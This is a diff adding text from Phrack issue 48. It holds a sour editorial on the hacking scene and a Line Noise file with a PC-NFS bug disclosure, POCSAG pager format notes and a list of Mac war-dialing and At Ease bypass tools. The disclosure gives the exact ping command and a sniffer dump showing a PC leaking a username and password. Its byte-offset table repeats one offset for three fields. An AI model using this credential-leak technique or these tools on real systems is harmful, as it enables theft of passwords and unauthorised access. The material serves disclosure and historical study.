+Oct 25 Seattle, WA- Varsity
+Nov 8 Ft Lauderdale FL- Fox Sunrise
+Nov 15 Gainesville,FL - Plaza Theater
+Nov 16 Hanover, NH- Dartmouth Theater
+Nov 22 Miami, FL- Alliance
+Nov 25,29,30 Tampa FL - Tampa Theatre
+Dec 13 Chicago, IL - Music Box
+
+
+[ THIS WAS DEFINATELY A SPAM.
+
+  I wonder what lovely cgi-bin holes that WWW site is sporting.
+
+  But wait, maybe they just want some k-rad cyber-press like
+  MGM got for the "Hackers" WWW page.  Oh man, what a dilemma.
+  To hack, or not to hack.  Assholes. ]
+
+
+-----------------------------------------------------------------------------
+
+
+                              ==Phrack Magazine==
+
+                   Volume Seven, Issue Forty-Eight, File 2a of 18
+
+                                Phrack Editorial
+                                       by
+                                  Erik Bloodaxe
+
+
+This may very well be my last Phrack editorial, since I'm no longer going to
+fill the day-to-day role of editor, so I figure I ought to close out my
+crusade to piss everyone off.
+
+I don't like most of you people.  The hacking subculture has become a
+mockery of its past self.  People might argue that the community has
+"evolved" or "grown" somehow, but that is utter crap.  The community
+has degenerated.  It has become a media-fueled farce.  The act of intellectual
+discovery that hacking once represented has now been replaced by one of
+greed, self-aggrandization and misplaced post-adolescent angst.
+
+DefCon IV epitomized this change in such amazing detail, that I can only hope
+to find words to describe it adequately.  Imagine the bastard offspring
+of Lollapalooza and a Star Trek convention.  Imagine 300+ people out of their
+homes, and away from Mother's watchful eye for the first time in their
+pathetic lives.  Imagine those same people with the ego of Rush Limbaugh and
+the social skills of Jeffrey Dahmer, armed with laptops loaded with programs
+they can't use, and talking at length to reporters about techniques they
+don't understand.  Welcome to DefCon.
+
+If I were to judge the health of the community by the turnout of this
+conference, my prognosis would be "terminally ill."
+
+It would seem that "hacking" has become the next logical step for many people
+looking for an outlet to strike back at "something."  "Well, gee, I've already
+pierced every available piece of skin on my body and dyed my hair blue...what
+on earth can I do now to shock my parents?  I know!  I'll break some federal
+laws, and maybe get my name in the paper!  THAT WOULD BE COOL!  It'll be
+just like that movie!"
+
+I hate to burst everyone's bubble, but you are so fucked up.
+
+In this day and age, you really don't have to do anything illegal to be
+a hacker.  It is well within the reach of everyone to learn more, and use
+more powerful computers legally than any of us from the late 70's and early
+80's ever dreamed.  Way back then, it was ALL about learning how to use these
+crazy things called computers.  There were hundreds of different types of
+systems, hundreds of different networks, and everyone was starting from ground
+zero.  There were no public means of access; there were no books in stores or
+library shelves espousing arcane command syntaxes; there were no classes
+available to the layperson.  We were locked out.
+
+Faced with these obstacles, normal, intelligent, law-abiding adolescents from
+around the globe found themselves attempting to gain access to these
+fascinating machines through whatever means possible.  There simply was
+no other way.  There were no laws, and yet everyone knew it wasn't strictly
+kosher behavior.  This fact added a cheap rush to the actual break-in, but
+the main drive was still simply to learn.
+
+Now, with the majority of operating systems being UNIX-based, and the majority
+of networks being TCP/IP-based the amount of knowledge to be gathered has
+shrunk considerably.  With the incredibly low prices of powerful personal
+computers, and the free availablity of complex operating systems, the need
+to break into remote systems in order to learn has been removed.  The only
+possible needs being met by remote intrusions would be a means to gather
+specific information to be sold, or that base psychological rush from doing
+something forbidden and getting away with it.  Chasing any high only leads
+to a serious crash, and in the case of breaking into computers, that
+only leads to jail.
+
+There is absolutely nothing cool about going to jail.  I know too many
+people who are currently in jail, who have been in jail, and some who are
+on their way to jail.  Trust me on this, people.  You will not be
+respected by anyone if you act rashly, do something careless and
+end up being convicted of several felonies.  In fact, all of your "friends,"
+(those who didn't get busted along with you, and turn state's evidence against
+you) will just think you were a moron for being so sloppy...until they also
+get nailed.
+
+Get raided and you will almost certainly spend time in jail.  Even once you
+are released, you will lose your passport and your ability to travel freely,
+you will lose your ability to do business in classified environments, you
+will become unemployable by most companies, you may even lose your rights to
+use computer or networking equipment for years.  Is is still worth it?
+
+I break into computers for a living, and I love my job.  However, I don't
+kid myself about just how lucky I really am.  Don't fool yourselves into
+thinking that it was easy for me to achieve this, or that anyone else can
+easily slip into such a role.  Staking out a claim in the information security
+industry is a continual battle for a hacker.  Your past will constantly
+stand in your way, especially if you try to hide it and lie to everyone.
+(Read the recent Forbes ASAP article and spot the hacker from Garrison
+Associates lying about his past, although he was raided for running
+the Scantronics Publications BBS in San Deigo just a few short years ago.
+Shame on you Kludge.)
+
+I've never lied about anything, so that can't be held over my head.  I've
+never been convicted of anything either, although I came closer to jail
+than hopefully any of you will ever experience.  The ONLY reason I avoided
+prison was the fact that law enforcement was not prepared to deal with
+that type of crime.  Now, I've taught many of those same law enforcement
+agencies about the nature of computer crimes.  They are all learning and
+not making the same mistakes any more.
+
+At the same time, the technology to protect against intrusions has increased
+dramatically.  Technology now exists that will not only stop attacks, but
+identify the attack methodology, the location of the attacker, and take
+appropriate countermeasures all in real-time.  The company I work for makes it.
+I've always said that anything that can stop me will stop almost anyone,
+even through I'm not anywhere close to the world's best.  There simply
+aren't that many things to monitor, once you know what to look for.
+
+The rewards have diminished and the risks have increased.
+
+Hacking is not about crime.  You don't need to be a criminal to be a hacker.
+Hanging out with hackers doen't make you a hacker any more than hanging
+out in a hospital makes you a doctor.  Wearing the t-shirt doesn't
+increase your intelligence or social standing.  Being cool doesn't mean
+treating everyone like shit, or pretending that you know more than everyone
+around you.
+
+Of course, I'm just a bitter old sell-out living in the past, so
+what do I know?
+
+Well, what I do know, is that even though I'm one of the few screaming about
+how fucked up and un-fun everything has become, I'm not alone in my disgust.
+There are a bunch of us who have reached the conclusion that the "scene"
+is not worth supporting; that the cons are not worth attending; that the
+new influx of would-be hackers is not worth mentoring.  Maybe a lot of us
+have finally grown up.
+
+In response, expect a great many to suddenly disappear from the cons.  We'll be
+doing our own thing, drinking a few cool drinks someplace warm, and reflecting
+on the collective pasts we've all drawn from, and how the lack of that
+developmental stage has ruined the newer generations.  So those of us
+with that shared frame of reference will continue to meet, enjoy each
+other's company, swap stock tips in the same breath as operating system
+flaws, and dream about the future of security.
+
+You're probably not invited.
+
+-----------------------------------------------------------------------------
diff --git a/phrack48/3.txt b/phrack48/3.txt
new file mode 100644
index 0000000..50e72b5
--- /dev/null
+++ b/phrack48/3.txt
@@ -0,0 +1,1164 @@
+                         ==Phrack Magazine==
+
+              Volume Seven, Issue Forty-Eight, File 3 of 18
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                Part I
+
+------------------------------------------------------------------------------
+
+PC-NFS Bug
+
+
+I have found a nice little security hole in PC-NFS version 5.x.  If you 
+ping a PC-NFS user with a packet size of between 1450 to 1480, the 
+PC's ICMP reply packet will divulge:
+
+	o The hostname of the PC
+	o The hostname of the PC's authentication server
+	o The username of the person logged in
+	o The password for the user (Thank you very much!)
+
+All of this information is in clear text unless PC-NFS's NETLOGIN is 
+used.  NETLOGIN uses XOR as its encryption, so this is hardly secure 
+either.
+
+NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested 
+and all freely return the above information on both PC-NFS versions 
+5.0 and 5.1a.  This should work with other driver/NIC configurations 
+also.
+
+You get the occasional added bonus of locking up the victims PC as 
+well!
+
+This bug was new to Sun and they have created a new PCNFS.SYS 
+driver for us.  They have labeled it PC-NFS.SYS version 5.1a.DOD.  
+This new version fills reply ICMP packets with nulls after 200 bytes of
+the requested pattern.
+
+Until you receive this patch from Sun, I would recommend setting all 
+external router interface MTU to a value of no greater than 1350 as this 
+is point where secrets are contained in the return packet.
+
+The Unix command to generate the below results is as follows:
+
+	ping -s -c1 pchost.victim.com 1480
+
+Use your favorite sniffer to filter ICMP packets and you have it.  If you 
+don't have a sniffer, try the -v(erbose) option of ping and convert the 
+hex to ascii starting around byte 1382.
+
+Sniffer output follows:
+
+19:03:48.81 
+        ip: evil.com->pchost.victim.com
+        icmp: echo request
+        62: 024 025 026 027 030 031 032 033 034 035
+        72: 036 037       !   "   #   $   %   &   '
+        82:   (   )   *   +   ,   -   .   /   0   1
+        92:   2   3   4   5   6   7   8   9   :   ;
+        102:   <   =   >   ?   @   A   B   C   D   E
+        112:   F   G   H   I   J   K   L   M   N   O
+        122:   P   Q   R   S   T   U   V   W   X   Y
+        132:   Z   [   \   ]   ^   _   `   a   b   c
+        142:   d   e   f   g   h   i   j   k   l   m
+        152:   n   o   p   q   r   s   t   u   v   w
+        162:   x   y   z   {   |   }   ~ 177 200 201
+        172: 202 203 204 205 206 207 210 211 212 213
+        182: 214 215 216 217 220 221 222 223 224 225
+        192: 226 227 230 231 232 233 234 235 236 237
+        202: 240 241 242 243 244 245 246 247 250 251
+        212: 252 253 254 255 256 257 260 261 262 263
+        222: 264 265 266 267 270 271 272 273 274 275
+        232: 276 277 300 301 302 303 304 305 306 307
+        242: 310 311 312 313 314 315 316 317 320 321
+        252: 322 323 324 325 326 327 330 331 332 333
+        262: 334 335 336 337 340 341 342 343 344 345
+        272: 346 347 350 351 352 353 354 355 356 357
+        282: 360 361 362 363 364 365 366 367 370 371
+        292: 372 373 374 375 376 377 000 001 002 003
+        302: 004 005 006 007 010 011 012 013 014 015
+        312: 016 017 020 021 022 023 024 025 026 027
+        322: 030 031 032 033 034 035 036 037       !
+        332:   "   #   $   %   &   '   (   )   *   +
+        342:   ,   -   .   /   0   1   2   3   4   5
+        352:   6   7   8   9   :   ;   <   =   >   ?
+        362:   @   A   B   C   D   E   F   G   H   I
+        372:   J   K   L   M   N   O   P   Q   R   S
+        382:   T   U   V   W   X   Y   Z   [   \   ]
+        392:   ^   _   `   a   b   c   d   e   f   g
+        402:   h   i   j   k   l   m   n   o   p   q
+        412:   r   s   t   u   v   w   x   y   z   {
+        422:   |   }   ~ 177 200 201 202 203 204 205
+        432: 206 207 210 211 212 213 214 215 216 217
+        442: 220 221 222 223 224 225 226 227 230 231
+        452: 232 233 234 235 236 237 240 241 242 243
+        462: 244 245 246 247 250 251 252 253 254 255
+        472: 256 257 260 261 262 263 264 265 266 267
+        482: 270 271 272 273 274 275 276 277 300 301
+        492: 302 303 304 305 306 307 310 311 312 313
+        502: 314 315 316 317 320 321 322 323 324 325
+        512: 326 327 330 331 332 333 334 335 336 337
+        522: 340 341 342 343 344 345 346 347 350 351
+        532: 352 353 354 355 356 357 360 361 362 363
+        542: 364 365 366 367 370 371 372 373 374 375
+        552: 376 377 000 001 002 003 004 005 006 007
+        562: 010 011 012 013 014 015 016 017 020 021
+        572: 022 023 024 025 026 027 030 031 032 033
+        582: 034 035 036 037       !   "   #   $   %
+        592:   &   '   (   )   *   +   ,   -   .   /
+        602:   0   1   2   3   4   5   6   7   8   9
+        612:   :   ;   <   =   >   ?   @   A   B   C
+        622:   D   E   F   G   H   I   J   K   L   M
+        632:   N   O   P   Q   R   S   T   U   V   W
+        642:   X   Y   Z   [   \   ]   ^   _   `   a
+        652:   b   c   d   e   f   g   h   i   j   k
+        662:   l   m   n   o   p   q   r   s   t   u
+        672:   v   w   x   y   z   {   |   }   ~ 177
+        682: 200 201 202 203 204 205 206 207 210 211
+        692: 212 213 214 215 216 217 220 221 222 223
+        702: 224 225 226 227 230 231 232 233 234 235
+        712: 236 237 240 241 242 243 244 245 246 247
+        722: 250 251 252 253 254 255 256 257 260 261
+        732: 262 263 264 265 266 267 270 271 272 273
+        742: 274 275 276 277 300 301 302 303 304 305
+        752: 306 307 310 311 312 313 314 315 316 317
+        762: 320 321 322 323 324 325 326 327 330 331
+        772: 332 333 334 335 336 337 340 341 342 343
+        782: 344 345 346 347 350 351 352 353 354 355
+        792: 356 357 360 361 362 363 364 365 366 367
+        802: 370 371 372 373 374 375 376 377 000 001
+        812: 002 003 004 005 006 007 010 011 012 013
+        822: 014 015 016 017 020 021 022 023 024 025
+        832: 026 027 030 031 032 033 034 035 036 037
+        842:       !   "   #   $   %   &   '   (   )
+        852:   *   +   ,   -   .   /   0   1   2   3
+        862:   4   5   6   7   8   9   :   ;   <   =
+        872:   >   ?   @   A   B   C   D   E   F   G
+        882:   H   I   J   K   L   M   N   O   P   Q
+        892:   R   S   T   U   V   W   X   Y   Z   [
+        902:   \   ]   ^   _   `   a   b   c   d   e
+        912:   f   g   h   i   j   k   l   m   n   o
+        922:   p   q   r   s   t   u   v   w   x   y
+        932:   z   {   |   }   ~ 177 200 201 202 203
+        942: 204 205 206 207 210 211 212 213 214 215
+        952: 216 217 220 221 222 223 224 225 226 227
+        962: 230 231 232 233 234 235 236 237 240 241
+        972: 242 243 244 245 246 247 250 251 252 253
+        982: 254 255 256 257 260 261 262 263 264 265
+        992: 266 267 270 271 272 273 274 275 276 277
+        1002: 300 301 302 303 304 305 306 307 310 311
+        1012: 312 313 314 315 316 317 320 321 322 323
+        1022: 324 325 326 327 330 331 332 333 334 335
+        1032: 336 337 340 341 342 343 344 345 346 347
+        1042: 350 351 352 353 354 355 356 357 360 361
+        1052: 362 363 364 365 366 367 370 371 372 373
+        1062: 374 375 376 377 000 001 002 003 004 005
+        1072: 006 007 010 011 012 013 014 015 016 017
+        1082: 020 021 022 023 024 025 026 027 030 031
+        1092: 032 033 034 035 036 037       !   "   #
+        1102:   $   %   &   '   (   )   *   +   ,   -
+        1112:   .   /   0   1   2   3   4   5   6   7
+        1122:   8   9   :   ;   <   =   >   ?   @   A
+        1132:   B   C   D   E   F   G   H   I   J   K
+        1142:   L   M   N   O   P   Q   R   S   T   U
+        1152:   V   W   X   Y   Z   [   \   ]   ^   _
+        1162:   `   a   b   c   d   e   f   g   h   i
+        1172:   j   k   l   m   n   o   p   q   r   s
+        1182:   t   u   v   w   x   y   z   {   |   }
+        1192:   ~ 177 200 201 202 203 204 205 206 207
+        1202: 210 211 212 213 214 215 216 217 220 221
+        1212: 222 223 224 225 226 227 230 231 232 233
+        1222: 234 235 236 237 240 241 242 243 244 245
+        1232: 246 247 250 251 252 253 254 255 256 257
+        1242: 260 261 262 263 264 265 266 267 270 271
+        1252: 272 273 274 275 276 277 300 301 302 303
+        1262: 304 305 306 307 310 311 312 313 314 315
+        1272: 316 317 320 321 322 323 324 325 326 327
+        1282: 330 331 332 333 334 335 336 337 340 341
+        1292: 342 343 344 345 346 347 350 351 352 353
+        1302: 354 355 356 357 360 361 362 363 364 365
+        1312: 366 367 370 371 372 373 374 375 376 377
+        1322: 000 001 002 003 004 005 006 007 010 011
+        1332: 012 013 014 015 016 017 020 021 022 023
+        1342: 024 025 026 027 030 031 032 033 034 035
+        1352: 036 037       !   "   #   $   %   &   '
+        1362:   (   )   *   +   ,   -   .   /   0   1
+        1372:   2   3   4   5   6   7   8   9   :   ;
+        1382:   <   =   >   ?   @   A   B   C   D   E
+        1392:   F   G   H   I   J   K   L   M   N   O
+        1402:   P   Q   R   S   T   U   V   W   X   Y
+        1412:   Z   [   \   ]   ^   _   `   a   b   c
+        1422:   d   e   f   g   h   i   j   k   l   m
+        1432:   n   o   p   q   r   s   t   u   v   w
+        1442:   x   y   z   {   |   }   ~ 177 200 201
+        1452: 202 203 204 205 206 207 210 211 212 213
+        1462: 214 215 216 217 220 221 222 223 224 225
+        1472: 226 227 230 231 232 233 234 235 236 237
+        1482: 240 241 242 243 244 245 246 247 250 251
+
+19:03:48.85 
+        ip: pchost.victim.com->evil
+        icmp: echo reply
+        62: 024 025 026 027 030 031 032 033 034 035
+        72: 036 037       !   "   #   $   %   &   '
+        82:   (   )   *   +   ,   -   .   /   0   1
+        92:   2   3   4   5   6   7   8   9   :   ;
+        102:   <   =   >   ?   @   A   B   C   D   E
+        112:   F   G   H   I   J   K   L   M   N   O
+        122:   P   Q   R   S   T   U   V   W   X   Y
+        132:   Z   [   \   ]   ^   _   `   a   b   c
+        142:   d   e   f   g   h   i   j   k   l   m
+        152:   n   o   p   q   r   s   t   u   v   w
+        162:   x   y   z   {   |   }   ~ 177 200 201
+        172: 202 203 204 205 206 207 210 211 212 213
+        182: 214 215 216 217 220 221 222 223 224 225
+        192: 226 227 230 231 232 233 234 235 236 237
+        202: 240 241 242 243 244 245 246 247 250 251
+        212: 252 253 254 255 256 257 260 261 262 263
+        222: 264 265 266 267 270 271 272 273 274 275
+        232: 276 277 300 301 302 303 304 305 306 307
+        242: 310 311 312 313 314 315 316 317 320 321
+        252: 322 323 324 325 000 000 324 005   ^   $
+        262:   : 004 000 000 000 000 000 000 000 000
+        272: 036 006   W   V   P   S   Q   R 016 007
+        282: 277   ^   $ 213 367 350   X   p   r   c
+        292: 212   E   "   < 000   u 005 350   V 003
+        302: 353   W   < 005   u 005 350   W 002 353
+        312:   N   < 010   u 007 306 006 325   # 001
+        322: 353   H   < 015   u 007 306 006 325   #
+        332: 001 353   =   < 017   u 007 306 006 325
+        342:   # 001 353   2   < 022   u 005 350 021
+        352: 002 353   $   < 003   u 005 350   9 003
+        362: 353 033   < 022   w 017   2 344 213 360
+        372: 212 204 300   #   P 350 225 305   X 353
+        382: 010   P 270   c 000 350 213 305   X 306
+        392: 006 205 347 000   Z   Y   [   X   ^   _
+        402: 007 037 313   P   S   Q   R   U 036 006
+        412:   W   V 214 310 216 330 216 300 306 006
+        422: 325   # 000 373 277   ^   $ 273   A 347
+        432: 271 006 000 215   6   d   $ 212 004 210
+        442: 005 212 007 210 004   F   G   C 342 363
+        452: 241   x   $ 243   |   $ 241   z   $ 243
+        462:   ~   $ 241 324   ) 243   x   $ 241 326
+        472:   ) 243   z   $ 277   ^   $ 212   E   "
+        482:   < 010   u 015   P 270   ` 000 350   $
+        492: 305   X 350 275 001 353 022   < 015   u
+        502: 012   P 270   a 000 350 023 305   X 353
+        512: 004   < 017   u 003 350 017 000 306 006
+        522: 205 347 000   ^   _ 007 037   ]   Z   Y
+        532:   [   X 303   P 270   < 000 350 363 304
+        542:   X 307   E   $ 000 000 215   u   " 213
+        552:   M 020 206 351 203 351 024 367 301 001
+        562: 000   t 006 213 331 306 000 000   A 321
+        572: 371 350   ,   o 211   ]   $ 307   E 030
+        582: 000 000 215   u 016 271 012 000 350 033
+        592:   o 211   ] 030 213   E 020 206 340 005
+        602: 016 000 243   `   % 211   >   b   % 214
+        612: 016   d   % 277   ^   %   . 376 006   ?
+        622: 020 350   9 276   . 376 016   ? 020 303
+        632:   & 213   E 002 013 300   t 020 243 326
+        642:   #   & 213   ] 004 211 036 330   # 350
+        652: 231   m 353   0 200   > 324   ) 000   t
+        662: 033   & 203   } 006 000   t 024 203   >
+        672: 326   # 000   u 015 350 031 000 203   >
+        682: 326   # 000   t 003 350   u   m 241 326
+        692:   #   & 211   E 002 241 330   #   & 211
+        702:   E 004 303   & 213   M 006 006   V   W
+        712: 016 007 272 000 000 277 334   # 350   $
+        722: 000 241 323   # 243 350   X 203   > 326
+        732:   # 000   u 023 366 006 343 015 001   u
+        742: 014 203   > 350   X 000   u 353 272 001
+        752: 000 342 332   _   ^ 007 303   Q   R   W
+        762: 203 372 000   u 021 203   > 030 214 000
+        772:   t 012 276 004 214 271 003 000 363 245
+        782: 353 010 270 377 377 271 003 000 363 253
+        792: 276   A 347 271 003 000 363 245   _ 270
+        802: 377 377 211   E 036 211   E     241 324
+        812:   ) 211   E 032 241 326   ) 211   E 034
+        822: 270     000 206 340 211   E 020 306   E
+        832: 016   E 306   E 017 000 307   E 022 000
+        842: 000 307   E 024 000 000 306   E 026 002
+        852: 306   E 027 001 307   E 014 010 000   3
+        862: 300 306   E   " 021 210   E   # 211   E
+        872:   & 211   E   ( 350 250 376   Z   Y 303
+        882: 200   > 326   # 000   u 014 213   E   *
+        892: 243 326   # 213   E   , 243 330   #   P
+        902: 270   V 000 350 205 303   X 303   P   S
+        912:   Q   R 213   E   : 213   ]   < 213   M
+        922:   & 213   U   ( 350 223   k   Z   Y   [
+        932:   X   P 270   \ 000 350   e 303   X 303
+        942: 306   E   " 000   P 270   X 000 350   X
+        952: 303   X 303   & 213   E 002   & 213   ]
+        962: 004   & 213   U 006 006   W 016 007 350
+        972:   Y   i   s 003 351 227 000 277 334   #
+        982:   W 271 003 000 363 245 276   A 347 271
+        992: 003 000 363 245   _ 211   E 036 211   ]
+        1002:     241 324   ) 211   E 032 241 326   )
+        1012: 211   E 034 270     000 206 340 211   E
+        1022: 020 306   E 016   E 306   E 017 000 307
+        1032:   E 022 000 000 307   E 024 000 000 306
+        1042:   E 026 377 306   E 027 001 307   E 014
+        1052: 010 000   3 300 306   E   " 010 210   E
+        1062:   # 211   E   & 377 006   h   % 241   h
+        1072:   % 211   E   ( 211 026 350   X 211 026
+        1082:   l   % 307 006   j   % 000 000 350 322
+        1092: 375 203   > 350   X 000   t   # 366 006
+        1102: 343 015 001   u   ! 203   >   j   % 000
+        1112:   t 353 203   >   j   % 001   u 011 241
+        1122:   l   %   + 006 350   X 353 015 270 375
+        1132: 377 353 010 270 376 377 353 003 270 377
+        1142: 377 307 006   l   % 000 000   _ 007   &
+        1152: 211   E 010 303   P 270   ^ 000 350 206
+        1162: 302   X 203   >   l   % 000   t 017 213
+        1172:   ]   (   ; 036   h   %   u 006 307 006
+        1182:   j   % 001 000 303   P 270   ; 000 350
+        1192:   g 302   X 203   >   l   % 000   t 006
+        1202: 307 006   j   % 002 000 303 000 000 000
+        1212: 000 000 000 000 000 000 000 000 000 000
+        1222: 000 000 000 000 000 000 000 000 000 000
+        1232: 000 000 000 000 000 000 000 000 000 000
+        1242: 000 000 000 000 000 000 000 000 002 000
+        1252: 000 000 300   A 000 000 034 000 000 000
+        1262: 200 000 000 000   k 000 000 000 000 016
+        1272: 000 000 000     000 000 000 000 000 000
+        1282: 010 000 000 000 252 001 000 000 010   5
+        1292: 000 000   r 027 301   . 000 000 000 000
+        1302: 036   F 300   . 000 000 000 000 036   F
+        1312: 300   . 000 000 000 000 000 000 000 000
+        1322: 000 000 000 000 000 000 000 000 000 000
+        1332: 000 000 000 000 000 000 000 000 000 000
+        1342: 000 000 000 000 000 000 000 000 000    
+        1352: 000 000 000 002 000 000 200 366   = 000
+        1362:   { 255 023 000 242 265 015 000 002 000
+        1372: 000 000   S 017 005 000   C 003 000 000
+        1382:   p   c   h   o   s   t 000 000 000 000
+        1392: 000 000 000 000 000 000 244   A   @   -
+        1402:   s   e   r   v   e   r   1 000 000 000
+        1412: 000 000 000 000 000 000 244   A   @ 001
+        1422: 000 000 000 000 000 000 000 000 000 000
+        1432: 000 000 000 000 000 000 244   A   @ 001
+        1442:   u   s   e   r   n   a   m   e 000 000
+        1452:   p   a   s   s   w   d 000 000 000 000
+        1462: 000 000 000 000 000 000 000 000 000 000
+        1472: 000 000 000 000 000 000 000 000 000 000
+        1482: 000 000 200 000   k 000 260 271 377 377
+        1492: 344 275   9 212
+
+The names have been changed to protect the innocent, but the rest is actual.
+
+Byte 1382:  PC's hostname
+Byte 1402:  PC's Authentication server hostname
+Byte 1382:  The user's account name.  Shows nobody if logged out.
+Byte 1382:  The user's password.
+
+------------------------------------------------------------------------------
+
+		POCSAG paging format, code and code capacity
+
+The POCSAG (Post Office Code Standardization Advisory Group) code is a
+synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
+structure. The POCSAG codes provides improved battery-saving capability and an
+increased code capacity.
+The POCSAG code format consists of a preamble and one or more batches of
+codewords. Each batch comprises a 32-bit frame synchronization code and eight
+64-bit address frames of two 32-bit addresses or idle codewords each. The
+frame synchronization code marks the start of the batch of codewords.
+
+-PREAMBLE STRUCTURE
+The preamble consists of 576 bits of an alternating 101010 pattern transmitted
+at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
+determine if the data received is a POCSAG signal and for synchronization with
+the stream of data.
+
+       |---Preamble----|-----------First Batch-------------|--Subsec. Batch--|
+
+        ______________________________________________________< <____________
+paging |  576 bits of  | |   |   |   |   |   |   |   |   | |   > >           |
+format |   reversals   |F| | | | | | | | | | | | | | | | |F|                 |
+       | (101010, etc) |S| | | | | | | | | | | | | | | | |S|                 |
+       |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
+							       > >
+1 FRAME = 2 CODEWORDS
+
+		Preamble	Batchs
+
+ 512 BPS	1125 mS		1062.5 mS
+
+1200 BPS	 480 mS		 453.3 mS
+
+CodeWords Structure
+        ____________________________________________________________________
+BIT    |   |              |       |                       |                 |
+NUMBER | 1 |   2 to 19    | 20,21 |       22 to 31        |        32       |
+       |___|______________|_______|_______________________|_________________|
+        ____________________________________________________________________
+ADDRESS|   |              |       |                       |                 | 
+FORMAT | 0 | Address Bits | S I B |   Parity Check Bits   |   Even parity   |
+       |___|______________|_______|_______________________|_________________|
+                              ^ 
+                              Source identifier bits 
+	____________________________________________________________________
+MESSAGE|   |                      |                       |                 |
+FORMAT | 1 |     Message Bits     |   Parity Check Bits   |   Even parity   |
+       |___|______________________|_______________________|_________________|
+
+-BATCH STRUCTURE
+A batch consist of frame synchronization code follow by 8 frames of two address
+codewords per frame (16 address codewords per batch). In order to maintain the
+proper batch structure, each frame is filled with two address codewords, or two
+idle codewords, or two message codewords, or any appropriate combination of the
+three codewords types.
+
+-FRAME SYNCHRONIZATION CODE STRUCTURE
+The frame synchronization (FS) code is a unique, reserved word that is used to
+identify the beginning of each batch. The FS code comprises the 32 bits:
+
+	011111100110100100001010111011000.
+
+-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
+An alternate frame synchronization (AFS) code can be selected to support special
+systems or systems that require increased coding capability. The AFS is
+generated in the same manner as an address codeword (i.e., BCH codeword with
+parity bits). The POCSAG signaling standard has reserved special codewords for
+the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
+system to support the AFS. The AFS will change to frame 0 on the programmer
+since no frame information is included in the AFS. The AFS should use address
+1 so that bit 20 and 21 are 0.
+
+-ADDRESS CODEWORD STRUCTURE
+An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
+the address bits. The pagers looks at these bits to find its own unique
+address. Each POCSAG codeword is capable of providing address information for
+four different paging sources (Address 1 to 4). These address are determined
+by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
+22 through 31 are the parity check bits, and bit 32 is the even parity bit.
+
+
+		BIT 20	    BIT 21
+Address 1         0	      0
+Address 2         0           1
+Address 3         1           0
+Address 4         1           1
+
+Pre-coded into the code plug are three bits which designate the frame location,
+within each batch, at which the pager's address is to be received; the decoder
+will look at the codewords in this frame for its address.
+Power is removed from the receiver during all frames other than the precoded
+one, thus extending pager battery life.
+
+-CODE CAPACITY 
+The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
+s 
+bits are the most-significant bits.
+
+-MESSAGE CODEWORD STRUCTURE
+A message codeword structure always start with a 1 in bit 1 and always follows
+directly after the address. Each message codeword replaces an address codeword
+in the batch.
+
+-IDLE CODEWORD STRUCTURE
+The idle codeword is unique, reserved codeword used to talk place of an address
+in any frame that would not otherwise be filled with 64 bits.
+Thus, if a frame contains only an address, an idle codeword comprises the 32
+bits:
+
+01111010100010011100000110010111
+
+-POCSAG CHARACTERS
+
+CHAR	HEX	|	CHAR	HEX	|	CHAR	HEX	|
+		|			|			|
+#	23	|	$	24	|	@	40	|
+[	5B	|	\	5C	|	]	5D	|
+^	5E	|	_	5F	|	'	60	|
+{	7B	|	|	7C	|	}	7D	|
+~ 	7E	|	DEL	7F	|	SP	20	|
+
+------------------------------------------------------------------------------
+
+MACINTOSH HACKING
+by Logik Bomb
+
+"My fellow astronauts..."
+-Dan Quayle
+
+        Now, two people have mailed Erik Bloodaxe asking about Macintosh
+hacking particularly war dialers, and each time he insulted Macs and tried
+to get someone to write a file on it. No one has done it. So I guess I have
+to.
+        First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
+originators of the Apple and the Macintosh were busted for phreaking in
+college. The Apple IIe was used almost universally by hackers. So why has
+the Mac fallen out of favor for hacking? Simple. Because it fell out of
+favor for everything else. Apple screwed up and wouldn't let clone makers
+license the MacOS. As a result, 80% of personal computers run DOS, and
+Macintoshes are left in the minority. Second, DOS compatible users, and
+hackers in particular, have an image of Mac users as a bunch of whiny
+lamers who paid too much for a computer and as a result are constantly
+defensive. The solution to this impression is to not be an asshole. I know
+it drives every Mac user crazy when he reads some article about Windows
+95's brand new, advanced features such as "plug-and-play" that the
+Macintosh has had since 1984. But just try and take it. If it's any
+consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
+hate Windows too.
+Now, on with the software.
+-------------------------
+Assault Dialer 1.5
+        Assault Dialer, by Crush Commando, is the premier Mac war dialer,
+the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
+have right now.  It is the successor to a previous war dialer known as Holy
+War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
+is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
+1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
+now.
+
+MacPGP 2.6.2 and PGPfone 1.0b4
+        MacPGP is the Macintosh port of the infamous PGP (Pretty Good
+Privacy.) This file is not about cryptography, so if you want to know about
+PGP read the fuckin' read me and docs that come with the file. Strangely
+enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
+your phone and making it a secure line, for the Mac _first._ I don't know
+why, and I haven't had a chance to test it, but the idea's pretty cool. If
+PGP doesn't get Zimmerman thrown in jail, this will.
+
+DisEase 1.0 and DisEase 3.0
+        Schools and concerned parents have always had a problem. Schools
+can't have students deleting the hard drive, and parents don't want their
+kids looking at the kinky pictures they downloaded. So Apple came out with
+At Ease, an operating system that runs over System 7, sort of the same way
+Windows runs off of DOS. However, I can't stand At Ease. Everything about
+it, from the Fisher-Price screen to the interface drives me crazy. It
+drives a lot of other people crazy too. So it was just a matter of time
+before someone made a program to override it. The first was DisEase 1.0, a
+small program by someone calling himself Omletman, that would override At
+Ease if you put in a floppy loaded with it and clicked six times. Omletman
